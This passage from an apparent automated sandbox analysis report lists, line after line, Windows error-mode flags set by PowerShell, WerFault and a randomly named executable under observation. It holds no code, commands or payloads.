            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
